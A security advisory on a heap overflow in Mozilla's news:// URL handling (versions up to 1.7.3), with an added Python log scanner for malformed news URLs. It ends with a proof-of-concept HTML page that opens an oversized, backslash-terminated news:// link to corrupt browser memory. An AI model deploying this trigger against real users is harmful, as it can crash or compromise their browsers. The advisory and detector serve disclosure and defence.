Issue:
======
A critical security vulnerability has been found in the Mozilla Project's code handling the NNTP protocol.
Details:
========
The Mozilla browser supports NNTP (news://) URLs, and a remote web page is able to trigger a
news:// connection to any server. I found a flaw in the NNTP handling code which may cause a heap overflow and allow a remote attacker to execute arbitrary code on the client machine.
Affected Versions
=================
Mozilla Browser <= 1.7.3 with mozilla-mail
Solution
========
This bug is fixed in Mozilla 1.7.5 (Bug 264388). Mozilla developer Dan Veditz claims that it is not exploitable: "A '\' on the end will certainly trash memory, but at that point you're no longer reading attacker-supplied data;".
On my RedHat 9.0 with Mozilla 1.7.3, the attached proof-of-concept code overflows the buffer using attacker-supplied data. I decided to make this bug public because the Mozilla Team hasn't warned users.
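The URL shape described above (news:// links with multi-kilobyte components and a trailing backslash) is easy to spot in proxy logs or page sources before a vulnerable client sees it. The following is an added detection example and is not part of the original advisory or of Mozilla's code; the 1024-character component threshold, the news/nntp/snews scheme list and the log lines are assumptions constructed for illustration.

```python
import re

# Assumed threshold: real host, newsgroup and article-id components are far
# shorter than this, while the proof of concept uses ~16 KB components.
MAX_COMPONENT_LEN = 1024
NEWS_SCHEMES = ("news", "nntp", "snews")  # assumed set of news-style schemes


def news_url_findings(url: str) -> list:
    """Return reasons a news-style URL looks malformed, or [] if it looks ordinary."""
    m = re.match(r"^([A-Za-z][A-Za-z0-9+.-]*):(?://)?(.*)$", url.strip(), re.S)
    if not m or m.group(1).lower() not in NEWS_SCHEMES:
        return []  # not a news URL: out of scope for this check
    rest = m.group(2)
    findings = []
    # A raw backslash is not a valid URL character; a trailing one is the
    # trigger the advisory describes.
    if "\\" in rest:
        findings.append("backslash in URL")
    # Oversized path/query components are the other half of the pattern.
    for comp in re.split(r"[/?]", rest):
        if len(comp) > MAX_COMPONENT_LEN:
            findings.append(
                f"component of length {len(comp)} exceeds {MAX_COMPONENT_LEN}"
            )
            break
    return findings


# Matches news-style URLs embedded in free text (log lines, HTML source).
NEWS_URL_RE = re.compile(r"\b(?:news|nntp|snews):[^\s\"'<>]+", re.I)


def scan_lines(lines) -> list:
    """Return (line_no, url_prefix, findings) for each suspicious news URL found."""
    hits = []
    for n, line in enumerate(lines, 1):
        for url in NEWS_URL_RE.findall(line):
            findings = news_url_findings(url)
            if findings:
                hits.append((n, url[:60], findings))
    return hits


# Constructed sample log lines (not real traffic): an ordinary HTTP request,
# a benign news:// link and a link of the malformed shape.
SAMPLE_LINES = [
    "2004-12-29 10:01:02 host1 GET http://www.example.com/index.html 200",
    "2004-12-29 10:01:05 host1 OPEN news://news.example.org/comp.security.announce",
    "2004-12-29 10:01:09 host1 OPEN news://news.example.org/"
    + "A" * 2000 + "/?profile/" + "A" * 2000 + "\\",
]

if __name__ == "__main__":
    for line_no, url, findings in scan_lines(SAMPLE_LINES):
        print(f"line {line_no}: {url}... -> {', '.join(findings)}")
```

Only the third sample line is reported, for both reasons (oversized component and backslash); the benign news:// link and the HTTP request produce no findings, so the check can run over a proxy log without flooding it.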
Proof of Concept
================
<html>
<script>
i = "news://news.individual.net/AAAAAAAAAAAAAA?";
for(l = 0; l < 16376; l++)
    i=i+"A";
i=i+"/?profile/";
for(l = 0; l < 16384; l++)
    i=i+"A";
i=i+"\\";
window.open(i);
</script>
</html>